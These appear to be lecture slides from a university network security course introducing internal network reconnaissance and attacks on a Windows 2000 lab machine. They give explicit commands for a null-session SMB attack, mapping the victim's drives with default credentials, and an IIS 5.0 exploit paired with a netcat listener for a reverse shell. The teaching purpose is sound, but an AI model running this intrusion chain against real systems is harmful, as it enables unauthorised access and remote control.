Transcript ITP 457 Network Security Network Hacking 101

ITP 457
Network Security
Network Hacking 101
Hacking Methodology (review)
1. Gather target information
2. Identify services and ports open on the target
3. Research the discovered services for known
vulnerabilities
4. Attempt to exploit the services
5. Utilize exploited services to gain additional
privileges from the target
6. Reiterate steps 1-5 until goals are achieved
Network Hacking

1.
2.
3.
4.
Methodology changes slightly because we
are focused at this point on security from
the inside
Gather information & map the network
Scan systems to see what’s alive
Determine services running
Attempt to penetrate the systems (if you
want )
Gathering Information

Upon connection to the network

Check your IP – normally automatically assigned
 Windows – ipconfig
 Linux – ifconfig
Useful information from
ipconfig







Physical Address – your computer’s MAC address
IPAddress – the ip address assigned to your computer
Subnet Mask – the mask used to limit the number of computers
on the network
Default gateway – the computer that is used to connect to ip
addresses outside of the network
DHCP server – the computer that distributes IP addresses
DNS servers – the computer that translates domain names to IP
addresses
IPconfig will identify between 1 and 3 computers without any
scanning! (DHCP, DNS, Gateway)
“Knock-knock”

Ping sweep



Single command: ping host


Ping – ICMP “echo request” packets
Will return if host is reachable (alive)
Host can be an IP or a domain name (e.g.
www.google.com)
We want to see all the hosts on our particular
network

Nmap (or Umit)

nmap –sP <target range>
Ping sweep vs. port scanning

Why not start with port scanning?




Normally, ping scanning is benign and will not get
you in trouble or caught
Port scanning is almost always seen as malicious
Limit the amount of time that you are port
scanning by just looking at systems that are alive
Also, there may be multiple subnets (multiple
parts of the network), with some not being
occupied. A ping sweep will quickly determine if a
particular IP range is up or not.
Determine Running Systems



Portscan the system that you want to break
into
Nmap will give a great report, including port
service numbers  very useful for
determining what is vulnerable
Nmap will also try to tell you what operating
system they are running

Is it always reliable?
Breaking in 


Once you’ve discovered what services are
running, you have to see which are
vulnerable
Determine which service you want to break,
and find a vulnerability

Places to look:
www.securityfocus.com
Null Session Hack




One of the oldest tricks for Windows 2000
Will allow any hard disk mounted in the
Win2k machine to be mapped as a network
drive on the hacker’s machine
Utilizes a vulnerability in the SMB shares
First, determine the IP address of the
Windows 2000 machine

Example: 192.168.0.106
Null Session Hack Cont’d

Establish the null session
net use \\ipaddress\ipc$ “” /u:””
 This command establishes the null session connection
Get the list of the usernames

The program Dumpsec will give you the
usernames and a whole lot more
http://www.somarsoft.com/cgibin/download.pl?DumpAcl
 Go to select computer, and enter the computer
address
 Go to “Dump Users as Column”, and it will give
you options to add more information to the report
DumpSec
Map the network drive

The command “net use” can also be used to map the victim’s
machine as a network drive on your computer




Caveat: you must know an adminstrator’s username and password
In our case, the user “Bob” does not have a password – typical for
insecure computers
Another common one: username “Administrator” password “Password”
The command:
net use Z: \\192.168.0.106\c$ “password” /u:”username”
Golly!
We want more!


We’ve established a remote drive connection,
but we cannot run any commands
We need either a remote shell (windows
command prompt) or a remote window (VNC
or terminal services)

Shell is easier, and does not require a lot of
bandwidth
Remember the portscanning

IIS was installed


Version 5.0
So let’s take a look and see what’s available



http://www.securityfocus.com/bid/2674/info
Download IIS5hack from the exploit section
You will also need netcat
http://www.vulnwatch.org/netcat/nc111nt.zip
Use the command: nc –l –p 1111
Tells netcat to listen on port 1111
The hack!


With netcat running, open another command prompt, and enter the
command:
iis5hack.exe victim-ip your-ip port-number
example:
iis5hack.exe 192.168.0.106 192.168.0.100 1111
This will open up a remote shell in the netcat window

MAKE SURE THE WINDOWS FIREWALL IS TURNED OFF!!!
What have you learned?



Methodology of a hack
How to remotely map a drive from a windows
2000 machine
How to hack IIS 5.0
Your lab



Find another way to hack into a Windows
2000 machine
Find a way to hack into the Windows XP SP0
machine
Give me step-by-step instructions on how you
did it. What sites did you go to? What tools
did you use?